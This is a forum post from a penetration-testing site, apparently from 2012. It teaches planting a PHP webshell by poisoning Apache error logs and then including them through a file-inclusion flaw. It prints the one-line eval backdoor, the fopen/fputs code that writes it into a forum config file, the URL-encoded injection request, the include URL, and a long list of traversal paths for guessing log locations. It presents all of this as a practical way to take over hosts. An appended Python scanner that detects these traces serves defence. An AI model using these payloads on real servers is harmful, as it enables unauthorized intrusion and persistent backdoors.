中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: Writing a webshell by including the Apache log from PHP
Author: admin
Time: 2012-9-15 14:27
Because the approach above is not very practical (in testing I found that the logs easily run to tens of megabytes, and at that size it is no fun to play with), let's take the idea a bit further and write a genuinely practical webshell to use, which is also far better than the painfully slow approach above.

For example, take the same one-line backdoor again:

<?eval($_POST[cmd]);?>

At this point you may already see that this is a very good approach. Reading on, the question becomes how to write it. Use this:

fopen opens the file /home/virtual/www.xxx.com/forum/config.php, and then the server-side one-line backdoor statement <?eval($_POST[cmd]);?> is written into it. Strung together as a PHP statement, that is

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?> //write the one-line backdoor statement into config.php

We submit this statement, let Apache record it in the error log, and then include the log, which writes the shell successfully. Remember that it must be converted to URL-encoded form for this to work.

Converted, it becomes

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E

We submit

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log records this line of code that writes the webshell.

Next we include the log, submitting

http://xxx.com/z.php?zizzy=/home
... /logs/www-error_log

This way the webshell is written successfully, and the one-line backdoor statement has been written into config.php.

OK.

http://www.xxx.com/forum/config.php
This has now become our webshell.

Connect directly with lanker's client and the host is yours.

PS: What is described above presupposes that the folder permissions are writable; it must be -rwxrwxrwx (777) to continue. Here, just use the directory listed above to check. Everything described above is exploitation in the case where the log path is known.

For other log paths, you can guess, or you can refer to the list here.

../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
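
The traces this technique leaves in Apache logs can be checked for mechanically. The following is an added example, not part of the original post: a Python sketch that flags log lines containing a PHP open tag after percent-decoding and requests whose parameter points at a log file. The sample lines, the finding names and the inert `<?php echo 1;?>` marker are constructed; only `z.php` and `zizzy` come from the post.

```python
import re
from urllib.parse import unquote

# Request field of an access-log line: "METHOD target PROTOCOL"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Log file names as they appear in the path list above (including "acces")
LOG_NAME_RE = re.compile(r"(access|acces|error)[._]log", re.I)

# Constructed sample lines (documentation IP addresses, inert PHP marker)
SAMPLE_LINES = [
    '203.0.113.5 - - [15/Sep/2012:14:27:01 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [15/Sep/2012:14:27:02 +0800] "GET /%3C%3Fphp%20echo%201%3B%3F%3E HTTP/1.1" 404 210',
    '203.0.113.9 - - [15/Sep/2012:14:27:03 +0800] "GET /z.php?zizzy=../../logs/error_log HTTP/1.1" 200 88',
    '[Sat Sep 15 14:27:02 2012] [error] [client 203.0.113.9] File does not exist: /var/www/html/<?php echo 1;?>',
    '203.0.113.9 - - [15/Sep/2012:14:27:05 +0800] "GET /%253C%253Fphp%2520echo%25201%253B%253F%253E HTTP/1.1" 404 210',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the set of findings for one access-log or error-log line."""
    findings = set()
    # A PHP open tag has no business in a request path or an error-log path.
    if "<?" in fully_decode(line):
        findings.add("php-open-tag")
    m = REQUEST_RE.search(line)
    if m:
        # Split on the raw "?" first: an encoded %3F is data, not the delimiter.
        _, _, raw_query = m.group("target").partition("?")
        query = fully_decode(raw_query)
        if LOG_NAME_RE.search(query):
            findings.add("log-file-in-parameter")
        if "../" in query or "..\\" in query:
            findings.add("traversal-in-parameter")
    return findings

def scan(lines):
    """Return (line number, sorted findings) for every line with findings."""
    return [(i, sorted(f)) for i, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LINES):
        print(number, ", ".join(found))
```

A hit from either check is a reason to review whether the include parameter is restricted to an allowlist of files and whether the web server account can read its own log files at all.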
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)